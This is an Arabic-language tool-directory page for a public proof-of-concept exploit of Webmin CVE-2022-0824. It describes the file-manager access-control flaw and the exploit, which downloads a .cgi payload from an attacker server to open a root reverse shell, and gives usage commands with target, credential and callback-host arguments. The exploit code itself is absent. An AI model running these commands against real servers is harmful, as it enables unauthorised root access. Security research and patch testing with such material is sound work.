Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Webmin-CVE-2022-0824-revshell — Webmin <=1.984، CVE-2022-0824 شل عكسي بعد المصادقة — إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Webmin <=1.984، CVE-2022-0824 شل عكسي بعد المصادقة — إثبات المفهوم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
11133منذ 4 سنواتتمت المراجعة من قبل Kitploit

Webmin-CVE-2022-0824-revshell

وصف الثغرة الأمنية

Webmin 1.984 وما دونه - استغلال صلاحيات مدير الملفات (CVE-2022-0824 وCVE-2022-0829)
يمكن للمستخدمين الأقل صلاحية في Webmin والذين ليست لديهم أي قيود على وحدة مدير الملفات الوصول إلى الملفات بصلاحيات الجذر (root)، إذا كانوا يستخدمون السمة الافتراضية Authentic. يجب ترقية جميع الأنظمة التي تحتوي على مستخدمي Webmin إضافيين غير موثوقين على الفور. لاحظ أن أنظمة Virtualmin غير متأثرة بهذه الثغرة، نظرًا للطريقة التي يتم بها تكوين مستخدمي Webmin من مالكي النطاقات.
المصدر: https://www.webmin.com/security.html

وصف الاستغلال

يستغل هذا الاستغلال ثغرة التحكم غير السليم في الوصول بعد المصادقة في مدير الملفات. يمكن لأي مهاجم مصادق بصلاحيات محدودة تنفيذ هذا الاستغلال. سيقوم بتنزيل ملف .cgi من خادم يتحكم فيه المهاجم عن بُعد وتعديل صلاحياته ليصبح قابلًا للتنفيذ بواسطة الجميع. وبمجرد القيام بذلك، سيقوم بتنفيذ ملف .cgi لإنشاء اتصال عكسي بالخادم الذي يتحكم فيه المهاجم بصلاحيات الجذر.

المرجع: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

الاستخدام

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

إثبات المفهوم (PoC)

root@kitploit:~
المضيف الهدف: https://192.168.5.118:10000
المضيف المهاجم: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

تم الاختبار على

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

إخلاء المسؤولية:

root@kitploit:~
هذا السكريبت مخصص لتحليل الأمن والبحث فقط، وبالتالي لن أكون مسؤولًا إذا تم استخدامه في أنشطة غير مشروعة.
تنزيل الأداة